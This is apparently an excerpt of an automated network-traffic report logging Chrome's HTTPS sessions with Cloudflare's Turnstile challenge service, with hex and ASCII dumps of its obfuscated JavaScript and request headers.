                                                                                                                  Data Ascii: return o={},o[hy(917)]=i[hy(1058)],s=o,i[hy(262)](m),n[hy(1164)][hy(438)](i[hy(999)](o,i[hy(272)])),s[hy(847)](function(hz,P){(hz=hy,F[hz(1164)][hz(1366)](),G[hz(1164)][hz(869)](),H[hz(1065)])&&(P={},P[hz(1031)]=s[hz(917)],P[hz(748)]=M[hz(857)][hz(858)],
                                                                                                                  2024-10-22 14:09:39 UTC1369INData Raw: 68 43 28 31 31 31 37 29 2b 31 2c 68 43 28 31 32 39 36 29 29 2b 65 4d 5b 68 43 28 38 35 37 29 5d 5b 68 43 28 37 33 33 29 5d 2b 27 2f 27 2c 65 4d 5b 68 43 28 38 35 37 29 5d 2e 63 48 29 2b 27 2f 27 2b 65 4d 5b 68 43 28 38 35 37 29 5d 5b 68 43 28 31 30 37 38 29 5d 2c 6e 3d 7b 7d 2c 6e 5b 68 43 28 31 33 32 31 29 5d 3d 65 4d 5b 68 43 28 38 35 37 29 5d 5b 68 43 28 31 33 32 31 29 5d 2c 6e 5b 68 43 28 39 35 32 29 5d 3d 65 4d 5b 68 43 28 38 35 37 29 5d 5b 68 43 28 39 35 32 29 5d 2c 6e 5b 68 43 28 31 36 38 38 29 5d 3d 65 4d 5b 68 43 28 38 35 37 29 5d 5b 68 43 28 31 36 38 38 29 5d 2c 6e 5b 68 43 28 31 34 30 39 29 5d 3d 65 4d 5b 68 43 28 38 35 37 29 5d 5b 68 43 28 34 30 38 29 5d 2c 6f 3d 6e 2c 73 3d 6e 65 77 20 65 4d 5b 28 68 43 28 36 37 31 29 29 5d 28 29 2c 21 73 29
                                                                                                                  Data Ascii: hC(1117)+1,hC(1296))+eM[hC(857)][hC(733)]+'/',eM[hC(857)].cH)+'/'+eM[hC(857)][hC(1078)],n={},n[hC(1321)]=eM[hC(857)][hC(1321)],n[hC(952)]=eM[hC(857)][hC(952)],n[hC(1688)]=eM[hC(857)][hC(1688)],n[hC(1409)]=eM[hC(857)][hC(408)],o=n,s=new eM[(hC(671))](),!s)
                                                                                                                  2024-10-22 14:09:39 UTC1369INData Raw: 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 6c 3d 6a 5b 31 5d 5b 68 44 28 31 34 30 30 29 5d 28 6b 29 2c 6c 26 26 28 67 3d 6c 5b 31 5d 2c 68 3d 65 5b 68 44 28 37 30 32 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 32 5d 2c 31 30 29 2c 69 3d 70 61 72 73 65 49 6e 74 28 6c 5b 33 5d 2c 31 30 29 29 29 3a 28 76 3d 65 5b 68 44 28 31 31 34 35 29 5d 28 74 68 69 73 2e 68 5b 65 5b 68 44 28 31 31 34 35 29 5d 28 31 38 36 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 2c 65 5b 68 44 28 33 31 30 29 5d 28 74 68 69 73 2e 68 5b 31 38 36 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 68 44 28 34 34 36 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 38 36 5d 5b 30 5d 2b 2b 29 2c 32 31 33 29 2b 32 35 36 26 32 35 35 2e 38 39 29 2c 78 3d 65 5b 68 44 28 37 35 38 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73
                                                                                                                  Data Ascii: (\d+):(\d+)/,l=j[1][hD(1400)](k),l&&(g=l[1],h=e[hD(702)](parseInt,l[2],10),i=parseInt(l[3],10))):(v=e[hD(1145)](this.h[e[hD(1145)](186,this.g)][3],e[hD(310)](this.h[186^this.g][1][hD(446)](this.h[this.g^186][0]++),213)+256&255.89),x=e[hD(758)](this.h[this
                                                                                                                  2024-10-22 14:09:39 UTC1369INData Raw: 2c 65 4d 5b 68 48 28 33 36 30 29 5d 28 43 2c 75 6e 64 65 66 69 6e 65 64 2c 73 5b 68 48 28 31 36 36 37 29 5d 29 7d 2c 31 30 29 2c 65 4d 5b 68 46 28 38 34 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 49 29 7b 68 49 3d 68 46 2c 65 4d 5b 68 49 28 31 32 35 35 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 68 46 28 37 38 33 29 5d 5b 68 46 28 31 30 32 31 29 5d 28 6c 5b 68 46 28 33 34 32 29 5d 2c 66 29 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 2c 66 77 3d 7b 7d 2c 66 77 5b 67 4c 28 38 31 33 29 5d 3d 66 76 2c 65 4d 5b 67 4c 28 31 35 36 32 29 5d 3d 66 77 2c 66 79 3d 65 4d 5b 67 4c 28 38 35 37 29 5d 5b 67 4c 28 31 35 34 31 29 5d 5b 67 4c 28 35 32 31 29 5d 2c 66 7a 3d 65 4d 5b 67 4c 28 38 35 37 29 5d 5b 67 4c 28 31 35 34 31 29 5d 5b 67 4c 28 31 32 37 32 29 5d 2c
                                                                                                                  Data Ascii: ,eM[hH(360)](C,undefined,s[hH(1667)])},10),eM[hF(847)](function(hI){hI=hF,eM[hI(1255)]()},1e3),eM[hF(783)][hF(1021)](l[hF(342)],f));continue}break}},fw={},fw[gL(813)]=fv,eM[gL(1562)]=fw,fy=eM[gL(857)][gL(1541)][gL(521)],fz=eM[gL(857)][gL(1541)][gL(1272)],
                                                                                                                  2024-10-22 14:09:39 UTC1369INData Raw: 5d 3d 66 44 2c 67 79 5b 67 4c 28 31 36 35 37 29 5d 3d 67 30 2c 67 79 5b 67 4c 28 31 32 35 34 29 5d 3d 67 31 2c 67 79 5b 67 4c 28 31 33 33 38 29 5d 3d 67 62 2c 67 79 5b 67 4c 28 31 33 39 36 29 5d 3d 67 61 2c 67 79 5b 67 4c 28 39 33 39 29 5d 3d 67 39 2c 67 79 5b 67 4c 28 35 32 38 29 5d 3d 67 38 2c 67 79 5b 67 4c 28 39 36 33 29 5d 3d 66 54 2c 67 79 5b 67 4c 28 31 36 38 35 29 5d 3d 67 78 2c 67 79 5b 67 4c 28 35 31 32 29 5d 3d 66 55 2c 67 79 5b 67 4c 28 34 33 38 29 5d 3d 66 59 2c 67 79 5b 67 4c 28 31 33 36 36 29 5d 3d 66 56 2c 67 79 5b 67 4c 28 31 35 33 38 29 5d 3d 66 51 2c 67 79 5b 67 4c 28 32 34 36 29 5d 3d 66 50 2c 65 4d 5b 67 4c 28 31 31 36 34 29 5d 3d 67 79 2c 67 7a 3d 66 75 6e 63 74 69 6f 6e 28 6a 6b 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 6a
                                                                                                                  Data Ascii: ]=fD,gy[gL(1657)]=g0,gy[gL(1254)]=g1,gy[gL(1338)]=gb,gy[gL(1396)]=ga,gy[gL(939)]=g9,gy[gL(528)]=g8,gy[gL(963)]=fT,gy[gL(1685)]=gx,gy[gL(512)]=fU,gy[gL(438)]=fY,gy[gL(1366)]=fV,gy[gL(1538)]=fQ,gy[gL(246)]=fP,eM[gL(1164)]=gy,gz=function(jk,d,e,f,g){return j
                                                                                                                  2024-10-22 14:09:39 UTC1369INData Raw: 31 30 39 34 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 6a 6c 29 7b 72 65 74 75 72 6e 20 6a 6c 3d 6a 6b 2c 64 5b 6a 6c 28 38 36 31 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 6d 29 7b 72 65 74 75 72 6e 20 6a 6d 3d 6a 6c 2c 6a 6d 28 31 30 34 31 29 5b 6a 6d 28 31 32 32 39 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6f 2c 73 2c 6a 6e 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 55 2c 4e 2c 4f 2c 50 2c 51 2c 52 29 7b 69 66 28 6a 6e 3d 6a 6b 2c 78 3d 7b 7d 2c 78 5b 6a 6e 28 31 35 33 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 53 2c 54 29 7b 72 65 74 75 72 6e 20 53 2b 54 7d 2c 78 5b 6a 6e 28 31 35 38 31 29 5d 3d 66 75 6e 63 74
                                                                                                                  Data Ascii: 1094)],f={'h':function(h,jl){return jl=jk,d[jl(861)](null,h)?'':f.g(h,6,function(i,jm){return jm=jl,jm(1041)[jm(1229)](i)})},'g':function(j,o,s,jn,x,B,C,D,E,F,G,H,I,J,K,L,M,U,N,O,P,Q,R){if(jn=jk,x={},x[jn(1530)]=function(S,T){return S+T},x[jn(1581)]=funct


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  74192.168.2.1649835104.18.94.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:40 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a10f63a046c33&lang=auto HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:40 UTC331INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:40 GMT
                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                  Content-Length: 125668
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a11050f1de7b3-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:09:40 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 62 61 58 49 73 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.baXIs4={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                                                                  2024-10-22 14:09:40 UTC1369INData Raw: 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67
                                                                                                                  Data Ascii: ,"human_button_text":"Verify%20you%20are%20human","turnstile_failure":"Error","turnstile_refresh":"Refresh","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_feedback_report":"Having
                                                                                                                  2024-10-22 14:09:40 UTC1369INData Raw: 31 36 32 31 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 30 32 33 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 32 38 30 29 29 2f 38 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 31 32 35 29 29 2f 39 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 36 31 39 29 29 2f 31 30 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 31 33 31 30 29 29 2f 31 31 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 34 35 39 29 29 2f 31 32 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 31 31 31 33 29 29 2f 31 33 29 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 35 36 38 35 32 33 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c
                                                                                                                  Data Ascii: 1621))/6)+parseInt(gK(1023))/7*(-parseInt(gK(1280))/8)+parseInt(gK(1125))/9+-parseInt(gK(619))/10*(parseInt(gK(1310))/11)+parseInt(gK(459))/12*(parseInt(gK(1113))/13),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,568523),eM=this||self,
                                                                                                                  2024-10-22 14:09:40 UTC1369INData Raw: 55 3d 65 54 5b 67 4c 28 31 32 34 36 29 5d 5b 67 4c 28 31 34 30 32 29 5d 28 65 54 29 2c 65 4d 5b 67 4c 28 32 31 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 67 54 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 67 54 3d 67 4c 2c 69 3d 7b 27 68 41 57 41 66 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3c 6f 7d 2c 27 48 72 6b 61 53 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 7d 2c 6a 3d 4f 62 6a 65 63 74 5b 67 54 28 37 39 36 29 5d 28 68 29 2c 6b 3d 30 3b 69 5b 67 54 28 31 31 31 29 5d 28 6b 2c 6a 5b 67 54 28 36 34 35 29 5d 29 3b 6b 2b 2b 29 69 66 28 6c 3d 6a 5b 6b 5d 2c 6c 3d 3d 3d 27 66 27 26 26 28 6c 3d 27 4e 27 29 2c 67 5b 6c 5d 29 7b 66 6f 72 28 6d 3d 30 3b 69 5b 67 54 28 31 31 31 29
                                                                                                                  Data Ascii: U=eT[gL(1246)][gL(1402)](eT),eM[gL(216)]=function(g,h,gT,i,j,k,l,m){for(gT=gL,i={'hAWAf':function(n,o){return n<o},'HrkaS':function(n,o){return n(o)}},j=Object[gT(796)](h),k=0;i[gT(111)](k,j[gT(645)]);k++)if(l=j[k],l==='f'&&(l='N'),g[l]){for(m=0;i[gT(111)
                                                                                                                  2024-10-22 14:09:40 UTC1369INData Raw: 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 26 46 7d 2c 27 62 71 74 4d 52 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 46 26 45 7d 2c 27 70 43 45 76 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 3d 3d 3d 46 7d 2c 27 5a 4a 53 74 70 27 3a 67 57 28 36 31 30 29 2c 27 4e 46 4e 4a 49 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 7c 7c 46 7d 2c 27 58 46 55 5a 76 27 3a 67 57 28 36 36 30 29 2c 27 62 69 6e 4b 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 74 4f 6a 64 43 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 49 45 52 64 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b
                                                                                                                  Data Ascii: n(E,F){return E&F},'bqtMR':function(E,F){return F&E},'pCEvK':function(E,F){return E===F},'ZJStp':gW(610),'NFNJI':function(E,F){return E||F},'XFUZv':gW(660),'binKM':function(E,F){return E+F},'tOjdC':function(E,F){return E+F},'IERdM':function(E,F){return E+
                                                                                                                  2024-10-22 14:09:40 UTC1369INData Raw: 3d 27 29 2b 44 29 7d 65 6c 73 65 20 66 6f 72 28 46 3d 67 57 28 39 39 39 29 5b 67 57 28 31 30 30 38 29 5d 28 27 7c 27 29 2c 47 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 46 5b 47 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 62 37 3d 62 38 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 61 50 5b 48 5d 3d 49 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 62 71 3d 62 72 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 62 42 3d 62 43 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 48 3d 61 76 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 48 3d 61 52 28 48 2c 36 29 5e 61 53 28 48 2c 31 31 29 5e 61 54 28 48 2c 32 35 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 62 75 3d 62 76 28 62 77 2c 48 29 3b 63 6f 6e 74 69 6e 75
                                                                                                                  Data Ascii: =')+D)}else for(F=gW(999)[gW(1008)]('|'),G=0;!![];){switch(F[G++]){case'0':b7=b8;continue;case'1':aP[H]=I;continue;case'2':bq=br;continue;case'3':bB=bC;continue;case'4':H=av;continue;case'5':H=aR(H,6)^aS(H,11)^aT(H,25);continue;case'6':bu=bv(bw,H);continu
                                                                                                                  2024-10-22 14:09:40 UTC1369INData Raw: 20 72 65 74 75 72 6e 20 76 6f 69 64 20 64 28 29 7d 7d 65 6c 73 65 20 66 3d 4a 53 4f 4e 5b 67 58 28 38 38 31 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 67 58 28 37 31 37 29 5d 3d 66 2c 6d 5b 67 58 28 35 30 30 29 5d 3d 67 2c 6d 5b 67 58 28 33 33 32 29 5d 3d 68 2c 6d 5b 67 58 28 37 39 38 29 5d 3d 69 2c 6d 5b 67 58 28 31 36 34 37 29 5d 3d 64 2c 6d 7d 2c 65 4d 5b 67 4c 28 31 32 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 2c 67 2c 68 2c 69 2c 67 5a 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 67 5a 3d 67 4c 2c 6a 3d 7b 7d 2c 6a 5b 67 5a 28 31 30 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3e 76 7d 2c 6b 3d 6a 2c 6c 3d 65 5b 67 5a 28 39 37 34 29 5d 28 29 2c 6d 3d 67 5a 28 36 37 38 29 2c 6b 5b 67 5a 28 31 30
                                                                                                                  Data Ascii: return void d()}}else f=JSON[gX(881)](d);return m={},m[gX(717)]=f,m[gX(500)]=g,m[gX(332)]=h,m[gX(798)]=i,m[gX(1647)]=d,m},eM[gL(127)]=function(e,f,g,h,i,gZ,j,k,l,m,n,o){(gZ=gL,j={},j[gZ(109)]=function(s,v){return s>v},k=j,l=e[gZ(974)](),m=gZ(678),k[gZ(10
                                                                                                                  2024-10-22 14:09:40 UTC1369INData Raw: 65 74 49 6e 74 65 72 76 61 6c 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 67 30 28 29 7d 2c 31 65 33 29 3b 65 6c 73 65 20 69 66 28 65 26 26 65 5b 68 51 28 37 37 34 29 5d 3d 3d 3d 64 5b 68 51 28 34 30 34 29 5d 26 26 65 5b 68 51 28 39 33 38 29 5d 3d 3d 3d 68 51 28 36 35 34 29 29 7b 69 66 28 64 5b 68 51 28 31 32 37 39 29 5d 28 64 5b 68 51 28 34 38 35 29 5d 2c 64 5b 68 51 28 34 38 35 29 5d 29 29 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 66 78 29 3b 65 6c 73 65 7b 69 66 28 61 56 5b 68 51 28 34 36 36 29 5d 5b 68 51 28 31 32 39 33 29 5d 5b 68 51 28 31 30 35 36 29 5d 28 61 57 2c 61 58 29 29 7b 69 66 28 32 35 36 3e 63 76 5b 68 51 28 38 39 32 29 5d 28 30 29 29 7b 66 6f 72 28 64 48 3d 30 3b 64 5b 68 51 28 39 35 33 29 5d 28 64 49 2c 64 4a 29 3b 64 4c 3c 3c 3d 31 2c 64 4e 2d
                                                                                                                  Data Ascii: etInterval,function(){g0()},1e3);else if(e&&e[hQ(774)]===d[hQ(404)]&&e[hQ(938)]===hQ(654)){if(d[hQ(1279)](d[hQ(485)],d[hQ(485)]))clearInterval(fx);else{if(aV[hQ(466)][hQ(1293)][hQ(1056)](aW,aX)){if(256>cv[hQ(892)](0)){for(dH=0;d[hQ(953)](dI,dJ);dL<<=1,dN-
                                                                                                                  2024-10-22 14:09:40 UTC1369INData Raw: 3d 66 4f 2c 67 31 5b 67 4c 28 31 36 30 31 29 5d 3d 66 4e 2c 67 31 5b 67 4c 28 32 30 33 29 5d 3d 66 35 2c 67 31 5b 67 4c 28 38 31 30 29 5d 3d 66 36 2c 67 31 5b 67 4c 28 34 35 34 29 5d 3d 66 74 2c 67 31 5b 67 4c 28 37 38 36 29 5d 3d 66 75 2c 67 31 5b 67 4c 28 31 32 36 33 29 5d 3d 66 45 2c 67 31 5b 67 4c 28 31 33 31 35 29 5d 3d 66 44 2c 67 31 5b 67 4c 28 39 34 38 29 5d 3d 66 43 2c 67 31 5b 67 4c 28 38 38 35 29 5d 3d 66 42 2c 67 31 5b 67 4c 28 35 38 39 29 5d 3d 66 6d 2c 67 31 5b 67 4c 28 31 33 31 34 29 5d 3d 67 30 2c 67 31 5b 67 4c 28 31 32 33 30 29 5d 3d 66 6e 2c 67 31 5b 67 4c 28 32 33 35 29 5d 3d 66 72 2c 67 31 5b 67 4c 28 31 36 30 33 29 5d 3d 66 6f 2c 67 31 5b 67 4c 28 39 38 35 29 5d 3d 66 6a 2c 67 31 5b 67 4c 28 39 32 34 29 5d 3d 66 69 2c 65 4d 5b 67 4c
                                                                                                                  Data Ascii: =fO,g1[gL(1601)]=fN,g1[gL(203)]=f5,g1[gL(810)]=f6,g1[gL(454)]=ft,g1[gL(786)]=fu,g1[gL(1263)]=fE,g1[gL(1315)]=fD,g1[gL(948)]=fC,g1[gL(885)]=fB,g1[gL(589)]=fm,g1[gL(1314)]=g0,g1[gL(1230)]=fn,g1[gL(235)]=fr,g1[gL(1603)]=fo,g1[gL(985)]=fj,g1[gL(924)]=fi,eM[gL
                                                                                                                  2024-10-22 14:09:40 UTC1369INData Raw: 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 57 50 70 76 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 3d 68 7d 2c 27 55 43 65 6f 43 27 3a 69 77 28 31 32 36 29 2c 27 4c 57 44 56 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 52 51 54 5a 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 6b 77 51 53 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 45 79 43 4e 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 4a 52 71 4f 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 45 6e 67 72 58 27 3a 66 75 6e 63 74 69 6f 6e
                                                                                                                  Data Ascii: i){return i!=h},'WPpvq':function(h,i){return i===h},'UCeoC':iw(126),'LWDVz':function(h,i){return h>i},'RQTZd':function(h,i){return i!=h},'kwQSi':function(h,i){return i&h},'EyCNP':function(h,i){return h<i},'JRqOW':function(h,i){return h*i},'EngrX':function


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  75192.168.2.1649836104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:41 UTC1165OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1404999773:1729602718:UZvFjMfw0a72K0DnQVvWkf_cJ8oGEoHDyA74KKOH6NY/8d6a10f63a046c33/cO9tUPOO1oMRkb0goA4TXv2TtUwkDfh7mWWvTLpIyCI-1729606178-1.1.1.1-LmynwZDJL511rAV_7PI8jhMXXWW7vCxKPpRpGqXQU7otoahf6IlBP1d7HO1_wi_F HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 3288
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  CF-Challenge: cO9tUPOO1oMRkb0goA4TXv2TtUwkDfh7mWWvTLpIyCI-1729606178-1.1.1.1-LmynwZDJL511rAV_7PI8jhMXXWW7vCxKPpRpGqXQU7otoahf6IlBP1d7HO1_wi_F
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv2/-VbzSdWhMfLGjLct/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:41 UTC3288OUTData Raw: 76 5f 38 64 36 61 31 30 66 36 33 61 30 34 36 63 33 33 3d 73 50 58 35 4f 35 6f 35 25 32 62 35 41 35 4f 2d 30 52 2d 30 75 35 2d 38 2b 57 4f 37 2d 32 6b 2d 56 56 30 49 51 30 2b 74 35 30 39 30 24 35 73 57 7a 56 30 67 35 69 75 58 35 2b 5a 6d 58 30 57 35 58 50 2d 51 47 7a 58 35 30 5a 53 30 69 58 7a 6d 30 70 78 30 24 2b 51 55 58 6b 30 68 35 7a 36 76 30 68 51 74 7a 32 41 35 2b 78 4d 38 38 37 6e 73 65 46 30 70 35 7a 44 4a 6f 35 7a 6b 34 30 47 74 2b 71 31 44 59 76 57 7a 4b 4a 46 34 79 38 50 65 30 63 75 38 77 61 74 78 5a 35 2b 61 30 41 6c 2d 4d 61 74 30 34 62 35 30 32 72 7a 2d 58 63 57 45 70 44 58 56 42 35 62 36 69 35 2b 2d 30 2d 50 38 79 42 33 58 78 45 78 30 52 67 72 4e 65 32 58 30 66 67 38 30 4e 78 46 38 30 70 41 69 32 67 6b 30 4a 43 7a 57 70 7a 35 41 30 63 34 75
